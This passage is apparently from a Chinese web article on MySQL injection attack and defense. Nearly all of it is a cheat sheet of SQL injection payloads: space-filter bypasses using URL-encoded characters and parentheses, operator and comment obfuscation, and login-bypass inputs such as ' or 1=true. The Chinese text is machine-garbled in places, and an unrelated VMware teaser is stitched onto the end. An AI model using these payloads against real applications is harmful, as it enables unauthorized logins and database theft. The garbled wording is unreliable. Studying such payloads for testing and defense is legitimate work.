(1) 特别字符绕过空格

Example:
- '%0AUNION%0CSELECT%A0NULL%20%23
括号绕过空格

Example:
- UNION(SELECT(column)FROM(table))
10. and/or后插入字符绕过空格
随便率性混淆+ - ~ !可以达到绕过空格的效不雅(可以如今本地测试,混淆后须要的奇偶数可能不合)
- SELECT DISTINCT(db) FROM mysql.db WHERE `Host`='localhost' and-++-1=1;须要偶数个--
- SELECT DISTINCT(db) FROM mysql.db WHERE `Host`='localhost' and!!~~~~!11=1;须要奇数个!
其实一下的字符都可以测试

十、注释符&引号
- SELECT DISTINCT(db) FROM mysql.db WHERE `Host`='localhost' and/**/11=1;
- SELECT DISTINCT(db) FROM mysql.db WHERE `Host`='localhost' and"11=1";
1. 编码绕过

2. 关键字绕过
测试用例information_schema.tables

3. 认证绕过
- select data from users where name="="
- select data from users where flase="
- select data from users where 00=0
绕过语句:'-'

- select data from users where name=''-''
- select data from users where name=0-0
- select data from users where 00=0
比如登录的时刻须要输入email和passwd,可以如许输入
- email=''&password=''
类型转换
- ' or 1=true
- ' or 1
- select * from users where 'a'='b'='c'
推荐阅读
如不雅体系已经连接到互联网,那么进入“Update”标签页,选择“Installed Updates”,之后“Install All Updates”。 在vSphere 6.5中,VMware改换了 vCe>>>详细阅读
本文标题:MySQL注入攻击与防御
地址:http://www.17bianji.com/lsqh/35071.html
1/2 1

网友点评
精彩导读
科技快报
品牌展示